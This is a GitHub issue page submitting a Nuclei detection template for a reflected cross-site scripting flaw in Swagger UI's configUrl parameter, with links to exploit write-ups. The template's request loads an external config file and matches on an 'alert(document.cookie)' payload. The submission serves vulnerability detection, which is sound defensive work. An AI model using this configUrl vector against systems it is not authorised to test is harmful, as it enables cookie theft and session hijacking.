Swagger UI 1.0.3 - Cross-Site Scripting (XSS)

### Is there an existing template for this?

- [x] I have searched the existing templates.

### Nuclei Template

```yaml
id: xss-vulnerability-configurl

info:
  name: XSS in configUrl Parameter
  author: 0xr2r
  severity: high
  description: |
    Detects a reflected XSS vulnerability in the `configUrl` parameter in the `/docs/` endpoint. Exploiting this can lead to session hijacking if the cookies are not secured.
  tags: xss,reflection

http:
  - method: GET
    path:
      - "{{BaseURL}}/docs/?configUrl=https://raw.githubusercontent.com/VictorNS69/swagger-ui-xss/2a7c2ded36a37a8bd43145354c566bd2ec753156/config.json"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "alert(document.cookie)"
      - type: word
        part: header
        words:
          - "text/html"
```

### Relevant dumped responses

```shell
https://www.rescana.com/post/swagger-ui-1-0-3-remote-cross-site-scripting-xss-vulnerability-comprehensive-analysis-exploitati

https://medium.com/@eabubakr21/exploiting-xss-in-swagger-ui-turning-apis-into-xss-playground-47ece3069d24

https://www.exploit-db.com/exploits/52392
```

### Anything else?

_No response_

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Swagger UI 1.0.3 - Cross-Site Scripting (XSS) #13867

Is there an existing template for this?

Nuclei Template

Relevant dumped responses

Anything else?

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Swagger UI 1.0.3 - Cross-Site Scripting (XSS) #13867

Description

Is there an existing template for this?

Nuclei Template

Relevant dumped responses

Anything else?

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions